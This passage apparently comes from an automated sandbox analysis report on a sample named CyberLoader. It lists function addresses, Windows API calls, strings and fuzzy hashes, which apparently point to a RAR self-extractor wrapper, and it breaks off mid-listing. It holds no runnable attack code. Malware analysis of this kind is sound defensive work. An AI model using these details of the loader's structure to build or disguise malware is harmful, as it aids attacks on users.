                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;%u$x%u$xc%u
                                                  • API String ID: 0-2277559157
                                                  • Opcode ID: c755fee75fe2bee979d566c1bf5cc42a34af7b62c383e24cc86084a2681721c6
                                                  • Instruction ID: 4d460cceff5123054113950d1fa79c6d6786efb45172178d33d53f6bb2706c6e
                                                  • Opcode Fuzzy Hash: c755fee75fe2bee979d566c1bf5cc42a34af7b62c383e24cc86084a2681721c6
                                                  • Instruction Fuzzy Hash: 76F139706242419BDB19EF3485D5BEA7799AFD0300F08C46DF88D9B283DA74D96CCB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028AD20
                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0028AD47
                                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0028AD60
                                                  • SetWindowTextW.USER32(?,?), ref: 0028AD71
                                                  • GetDlgItem.USER32(?,00000065), ref: 0028AD7A
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0028AD8E
                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0028ADA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                                  • String ID: LICENSEDLG
                                                  • API String ID: 3214253823-2177901306
                                                  • Opcode ID: ecb77f7280bb930adb32374e56740831f721579fb054ba544181aba0b23140df
                                                  • Instruction ID: fceb9297faf90fda6a06dfb55d9ae5adad6d5b55e9c644193e176768a40dabe5
                                                  • Opcode Fuzzy Hash: ecb77f7280bb930adb32374e56740831f721579fb054ba544181aba0b23140df
                                                  • Instruction Fuzzy Hash: D821A535662105BBE6216F21BC4DF3B3B6CEB5A746F014016F604E24E1DE62AD24D732
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00279443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00279448
                                                  • GetLongPathNameW.KERNEL32 ref: 0027946B
                                                  • GetShortPathNameW.KERNEL32 ref: 0027948A
                                                    • Part of subcall function 002817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0027BB05,00000000,.exe,?,?,00000800,?,?,002885DF,?), ref: 002817C2
                                                  • _swprintf.LIBCMT ref: 00279526
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • MoveFileW.KERNEL32 ref: 00279595
                                                  • MoveFileW.KERNEL32 ref: 002795D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                  • String ID: rtmp%d
                                                  • API String ID: 2111052971-3303766350
                                                  • Opcode ID: 6d25b5fd6baf337014ec9e095ecae4f9b139760ec3f48cfbd79da1be5320d7b1
                                                  • Instruction ID: c437af3e0d966dec8143ec1adc8113e1a27b3c2f8f9e6e259d39e0145e8807db
                                                  • Opcode Fuzzy Hash: 6d25b5fd6baf337014ec9e095ecae4f9b139760ec3f48cfbd79da1be5320d7b1
                                                  • Instruction Fuzzy Hash: 51415071920259AACF21EF648C85EDE737CAF51380F0485E5B54DA3041EB748BE9CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00298FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,002B0EE8,00293E14,002B0EE8,?,?,00293713,00000050,?,002B0EE8,00000200), ref: 00298FA9
                                                  • _free.LIBCMT ref: 00298FDC
                                                  • _free.LIBCMT ref: 00299004
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 00299011
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 0029901D
                                                  • _abort.LIBCMT ref: 00299023
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID: X*
                                                  • API String ID: 3160817290-76513911
                                                  • Opcode ID: 22157a33c6a48666592a8e7a91dffa0781e4e143c689e81f04a7be7af6b51f35
                                                  • Instruction ID: 134e5c879545984806f20171d7a75c2ed4472f46d9493c023a4a5049811821de
                                                  • Opcode Fuzzy Hash: 22157a33c6a48666592a8e7a91dffa0781e4e143c689e81f04a7be7af6b51f35
                                                  • Instruction Fuzzy Hash: 5DF028365346026BCE217B287C0EB2B292A9FC3770F2E0028F515D3692EF31CD325850
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00280A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __aulldiv.LIBCMT ref: 00280A9D
                                                    • Part of subcall function 0027ACF5: GetVersionExW.KERNEL32(?), ref: 0027AD1A
                                                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00280AC0
                                                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00280AD2
                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00280AE3
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280AF3
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00280B03
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00280B3D
                                                  • __aullrem.LIBCMT ref: 00280BCB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                  • String ID:
                                                  • API String ID: 1247370737-0
                                                  • Opcode ID: e2fdd8d8e0c4c5cec857a614bbe7b9560c1e38039e0c07690c4d16004dc5f4a7
                                                  • Instruction ID: 48c6621c5929b969ae2d574c08f1a3310ad632f5fae3320edf378b016439b779
                                                  • Opcode Fuzzy Hash: e2fdd8d8e0c4c5cec857a614bbe7b9560c1e38039e0c07690c4d16004dc5f4a7
                                                  • Instruction Fuzzy Hash: 844149B5408306AFC750DF65C88496BFBF8FF88718F004A2EF59692650E778E558CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0029F5A2,?,00000000,?,00000000,00000000), ref: 0029EE6F
                                                  • __fassign.LIBCMT ref: 0029EEEA
                                                  • __fassign.LIBCMT ref: 0029EF05
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0029EF2B
                                                  • WriteFile.KERNEL32(?,?,00000000,0029F5A2,00000000,?,?,?,?,?,?,?,?,?,0029F5A2,?), ref: 0029EF4A
                                                  • WriteFile.KERNEL32(?,?,00000001,0029F5A2,00000000,?,?,?,?,?,?,?,?,?,0029F5A2,?), ref: 0029EF83
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
                                                  • Opcode ID: c7dc2eb14e928aebfb178dec7d0c3024df57fe78ac8756231c8e20c1a5aadee3
                                                  • Instruction ID: 1abf4cdc4a99dfb7363fb0b1c90473bfeb6dbbeb8f6156436f07bb71b781060b
                                                  • Opcode Fuzzy Hash: c7dc2eb14e928aebfb178dec7d0c3024df57fe78ac8756231c8e20c1a5aadee3
                                                  • Instruction Fuzzy Hash: 7C51B070A10209AFCF10CFA8D885BEEBBF9EF09310F25451AE955E7691E770A950CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0028C54A
                                                  • _swprintf.LIBCMT ref: 0028C57E
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • SetDlgItemTextW.USER32(?,00000066,002B946A), ref: 0028C59E
                                                  • _wcschr.LIBVCRUNTIME ref: 0028C5D1
                                                  • EndDialog.USER32(?,00000001), ref: 0028C6B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                  • String ID: %s%s%u
                                                  • API String ID: 2892007947-1360425832
                                                  • Opcode ID: 6b50b619fb487af4bd7d70458e0dcce56cb52c58ed7cdc216d6e07c3ed2d51df
                                                  • Instruction ID: cc4a38ef69941ca44892dc041e819ddad4f1986e192a4c0182a4b996d9c9245d
                                                  • Opcode Fuzzy Hash: 6b50b619fb487af4bd7d70458e0dcce56cb52c58ed7cdc216d6e07c3ed2d51df
                                                  • Instruction Fuzzy Hash: EB41C475D20619AADF26EFA0DC45EDA77BCEF48301F1040A6E509E60A1E7719BD4CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00288E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00288F38
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00288F59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AllocByteCharGlobalMultiWide
                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                  • API String ID: 3286310052-4209811716
                                                  • Opcode ID: 7e5a5ef17a70c930cc85c189cfda993b3240638fe66b7e0eb2f8251e7f1f5f36
                                                  • Instruction ID: 650d3aab3ca5afad6d07f57f15fbe14a6102e3e6dabcf7e4258826c52972216d
                                                  • Opcode Fuzzy Hash: 7e5a5ef17a70c930cc85c189cfda993b3240638fe66b7e0eb2f8251e7f1f5f36
                                                  • Instruction Fuzzy Hash: BB3148355293126BDB24BF309C06FAB7B68DF96720F80011EF901961D2EF649A2987A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00289635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(?,00000000), ref: 0028964E
                                                  • GetWindowRect.USER32(?,00000000), ref: 00289693
                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 0028972A
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00289732
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00289748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$RectText
                                                  • String ID: RarHtmlClassName
                                                  • API String ID: 3937224194-1658105358
                                                  • Opcode ID: a57bafd299908c641a5436dff8296a0058f2e6db1b6465a7bbea2e42697ca041
                                                  • Instruction ID: 2e2ae708e1ec6bf512e86c06e0e9f082e65d6ace43d48f9fcbac24d064a64595
                                                  • Opcode Fuzzy Hash: a57bafd299908c641a5436dff8296a0058f2e6db1b6465a7bbea2e42697ca041
                                                  • Instruction Fuzzy Hash: D331C275416210EFCB11AF64EC4CB6BBBA8EF48301F04855AFA4996193DB30D868CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0029BF79: _free.LIBCMT ref: 0029BFA2
                                                  • _free.LIBCMT ref: 0029C003
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 0029C00E
                                                  • _free.LIBCMT ref: 0029C019
                                                  • _free.LIBCMT ref: 0029C06D
                                                  • _free.LIBCMT ref: 0029C078
                                                  • _free.LIBCMT ref: 0029C083
                                                  • _free.LIBCMT ref: 0029C08E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                  • Instruction ID: c1c23cdbef0dc7be1a75073f0dfab0e4ef56bf171463a7c25994bd0d3f134baa
                                                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                  • Instruction Fuzzy Hash: 34114F71560B08FADE21BBB0DD4BFCBB79D6F01700F448825B29D66C52DB65F9248E90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002920CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,002920C1,0028FB12), ref: 002920D8
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002920E6
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002920FF
                                                  • SetLastError.KERNEL32(00000000,?,002920C1,0028FB12), ref: 00292151
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 4201d051b3aef887117f106274c0861927250fa4e45cf59d5f58771aad0825c2
                                                  • Instruction ID: ab147988b0d2594f051603565488523b6fad6178dbbdba13078ffe1fa24455a6
                                                  • Opcode Fuzzy Hash: 4201d051b3aef887117f106274c0861927250fa4e45cf59d5f58771aad0825c2
                                                  • Instruction Fuzzy Hash: D8018832179312BFAF546FB57C8D5163A4CEB13B747220B29F228551F2EE514C395A44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00299029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0029895F,002985FB,?,00298FD3,00000001,00000364,?,00293713,00000050,?,002B0EE8,00000200), ref: 0029902E
                                                  • _free.LIBCMT ref: 00299063
                                                  • _free.LIBCMT ref: 0029908A
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 00299097
                                                  • SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 002990A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID: X*
                                                  • API String ID: 3170660625-76513911
                                                  • Opcode ID: b1ed8387fc9a7f9d134087dda5beb4b0dce5920f69a0117db1a302933490a829
                                                  • Instruction ID: b3097c9d0c80ce6cc05594e06dc02fdc1da3f61ccc522154c8241881ad19ce0a
                                                  • Opcode Fuzzy Hash: b1ed8387fc9a7f9d134087dda5beb4b0dce5920f69a0117db1a302933490a829
                                                  • Instruction Fuzzy Hash: 1501F936535B016FCF216B78BC8992B262D9FD3771326012DF52593151EE70CC714560
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                  • API String ID: 0-1718035505
                                                  • Opcode ID: 3c2bc64b46bc1d6bd473f71fa9ca624ce3b9600c92c6976a1501b39135f78c1b
                                                  • Instruction ID: 69ee52346dc3e6c8f7036cd78309c56e0eb26ddb88cb4db14ed4374060882c86
                                                  • Opcode Fuzzy Hash: 3c2bc64b46bc1d6bd473f71fa9ca624ce3b9600c92c6976a1501b39135f78c1b
                                                  • Instruction Fuzzy Hash: 5F01F47A6732239B4F207E746CC96AB6794AA47312320053BE501D32D0EE91CCA9D7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00298060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0029807E
                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 00298090
                                                  • _free.LIBCMT ref: 002980A3
                                                  • _free.LIBCMT ref: 002980B4
                                                  • _free.LIBCMT ref: 002980C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
